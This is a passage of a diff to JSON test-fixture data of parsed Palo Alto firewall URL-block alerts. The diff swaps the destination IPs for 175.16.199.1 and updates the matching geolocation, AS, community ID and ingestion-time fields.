States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691976100Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -9853,26 +9925,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9888,14 +9962,14 @@ "port": 53133, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -9910,7 +9984,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:4MqfykfAOpIQmtvXcxzLNXqgyTs=" + "community_id": "1:XPW2Xo57vMe/e1J/4jEkCUgsq/A=" } }, "threat_category": "unknown", @@ -9955,8 +10029,8 @@ ], "network": { "community_id": [ - "1:S99EiT3uXg1VHeNM5TVPoeW1Zrk=", - "1:4MqfykfAOpIQmtvXcxzLNXqgyTs=" + "1:8SLZuF/iGteQ/lA8onZg6KSd/bA=", + "1:XPW2Xo57vMe/e1J/4jEkCUgsq/A=" ], "transport": "tcp", "application": "ssl", @@ -9995,14 +10069,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768284113Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691982300Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -10025,26 +10099,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10060,14 +10136,14 @@ "port": 53134, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -10082,7 +10158,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:Qj+AYB26PhFUPHkeHTP+u0XmR3A=" + "community_id": "1:6z9BQ8bWee+7czlaKdC6EcLBMxk=" } }, "threat_category": "unknown", @@ -10127,8 +10203,8 @@ ], "network": { "community_id": [ - "1:IMZ08eMrtDP/qCq8+cruyYo5r98=", - "1:Qj+AYB26PhFUPHkeHTP+u0XmR3A=" + "1:+L6RwsYCoS6WiJNcFn7uYMI0XMA=", + "1:6z9BQ8bWee+7czlaKdC6EcLBMxk=" ], "transport": "tcp", "application": "ssl", @@ -10167,14 +10243,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768292735Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691988700Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -10197,26 +10273,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10232,14 +10310,14 @@ "port": 53135, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -10254,7 +10332,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:BQw3RXiNvT4NW4kw0J5Ol6rFN5A=" + "community_id": "1:oEzch01PssG3seKhubEA7CAefoI=" } }, "threat_category": "unknown", @@ -10299,8 +10377,8 @@ ], "network": { "community_id": [ - "1:Z6zBvBoA+0NQryjJ96nYaFcOuXw=", - "1:BQw3RXiNvT4NW4kw0J5Ol6rFN5A=" + "1:aA3Vr2qaw272iGwjQjO4RelJqxE=", + "1:oEzch01PssG3seKhubEA7CAefoI=" ], "transport": "tcp", "application": "ssl", @@ -10339,14 +10417,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768296877Z", - "original": "Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691995100Z", + "original": "Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -10369,29 +10447,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10407,14 +10484,14 @@ "port": 53152, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -10429,7 +10506,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:1XJhGS1EujYy5wSCA64wjjK7hwA=" + "community_id": "1:Xt3TJIRe2gqqzQimJKnaiilDMSA=" } }, "threat_category": "unknown", @@ -10474,8 +10551,8 @@ ], "network": { "community_id": [ - "1:Qo8vSWzvn9QN5ADlmHxjJft+bxA=", - "1:1XJhGS1EujYy5wSCA64wjjK7hwA=" + "1:mOAl+VIdWqJOivBzVNLNd2Tkzp0=", + "1:Xt3TJIRe2gqqzQimJKnaiilDMSA=" ], "transport": "tcp", "application": "ssl", @@ -10514,14 +10591,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768300769Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692001400Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -10544,29 +10621,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10582,14 +10658,14 @@ "port": 53155, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -10604,7 +10680,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:YHN6cU700Mp7622M1rIzbnPQ+ik="
+ "community_id": "1:VWs4UWKf8SSAgZ2vTlmEYUnzm8A="
 }
 },
 "threat_category": "unknown",
@@ -10649,8 +10725,8 @@
 ],
 "network": {
 "community_id": [
- "1:N2DPhwTnklulMwYKpcc4j0nLwu4=",
- "1:YHN6cU700Mp7622M1rIzbnPQ+ik="
+ "1:FBAOxCzzN5pXB6JXA6nVqQ5nY80=",
+ "1:VWs4UWKf8SSAgZ2vTlmEYUnzm8A="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -10689,14 +10765,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768304740Z",
- "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692007700Z",
+ "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:26.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -10719,29 +10795,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -10757,14 +10832,14 @@
 "port": 53158,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -10779,7 +10854,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:o5UB5uvp2ThXPXChyc7lgvBMH0s="
+ "community_id": "1:gZ12MVLkixlhUZ9zshgzzRzyV5U="
 }
 },
 "threat_category": "unknown",
@@ -10824,8 +10899,8 @@
 ],
 "network": {
 "community_id": [
- "1:j5m21kfahBuP4jLMiqVnsVTJZ+Q=",
- "1:o5UB5uvp2ThXPXChyc7lgvBMH0s="
+ "1:rRimmkY7Rf+bKXyyb/f9P5qVs4A=",
+ "1:gZ12MVLkixlhUZ9zshgzzRzyV5U="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -10864,14 +10939,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768371103Z",
- "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692014Z",
+ "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:26.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -10894,29 +10969,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -10932,14 +11006,14 @@
 "port": 53160,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -10954,7 +11028,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:RRfOKybSMc/qYj1QHLEpuh+r0Eg="
+ "community_id": "1:yHmBEbzUrk+NT5+GUmqZ3AXUfKw="
 }
 },
 "threat_category": "unknown",
@@ -10999,8 +11073,8 @@
 ],
 "network": {
 "community_id": [
- "1:8jQcqVCl+Q8N6jDNJlJwuydmDsA=",
- "1:RRfOKybSMc/qYj1QHLEpuh+r0Eg="
